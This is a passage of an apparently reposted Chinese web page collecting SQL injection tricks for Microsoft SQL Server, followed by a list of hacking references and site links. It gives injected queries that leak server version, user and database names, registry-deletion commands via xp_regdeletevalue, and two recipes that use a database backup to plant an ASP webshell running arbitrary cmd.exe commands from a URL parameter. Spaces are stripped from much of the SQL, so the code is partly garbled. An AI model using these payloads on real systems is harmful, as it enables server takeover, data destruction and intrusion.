SQL注入技巧资料大全
2008-10-27 16:51:24 来源:WEB开发网execxp_regdeletevalue'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersion',
'TestValueName'删除某个值
xp_regdeletekey'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersionTestkey'删除键,包括该键下所有值
14.mssql的backup创建webshell
usemodel
createtablecmd(strimage);
insertintocmd(str)values('<%DimoScript%>');
backupdatabasemodeltodisk='c:l.asp';
15.mssql内置函数
;and(select@@version)>0获得Windows的版本号
;anduser_name()='dbo'判断当前系统的连接用户是不是sa
;and(selectuser_name())>0爆当前系统的连接用户
;and(selectdb_name())>0得到当前连接的数据库
16.简洁的webshell
usemodel
createtablecmd(strimage);
insertintocmd(str)values('<%=server.createobject("wscript.shell").exec("cmd.exe/c"&request("c")).stdout.readall%>');
backupdatabasemodeltodisk='g:wwwtestl.asp';
请求的时候,像这样子用:
http://ip/l.asp?c=dir
参考资料(自己GOOGLE)
SQL注入天书-ASP注入漏洞全接触(小竹)
MSSQL跨库查询(臭要饭的!黑夜)
榨干MSSQL最后一滴血
SQL语句参考及记录集对象详解
关于SQLServer中存储过程
利用mssqlbackup创建webshell
SQL_Injection高级应用
跨站式SQL注入(老凯(laokai))
怪异的SQL注入(AMANL)
SQLServer应用程序中的高级SQL注入(翻译:青野志狼)
如何利用Sql注入遍历目录(sinkaQQ:20355)
SQLInjection技巧的演练(翻译人:demonalex)
SQL数据库的一些攻击
SQLInjection攻击技术(JSW)
SQL_Injection高级应用(apachy)
SQL注入的不常见方法(桂林老兵)
Backupashell
谈php+mysql注射语句构造(黑嘿黑·≯Super·Hei)
AdvancedSQLInjectionwithMySQL(angel)
L'injection(My)SQLviaPHP
OracleSQL语言
- ››sql server自动生成批量执行SQL脚本的批处理
- ››sql server 2008亿万数据性能优化
- ››SQL Server 2008清空数据库日志方法
- ››sqlserver安装和简单的使用
- ››SQL Sever 2008 R2 数据库管理
- ››SQL SERVER无法安装成功,sqlstp.log文件提示[未发...
- ››Sql Server中通过父记录查找出所有关联的子记录
- ››SqlServer触发器、存储过程和函数
- ››SQL Server 中的事务(含义,属性,管理)
- ››Sqlite数据库插入和读取图片数据
- ››Sql server 2005拒绝了对对象 'xx表' (数...
- ››Sql server 2005拒绝了对对象 'xx表' (数...
更多精彩
赞助商链接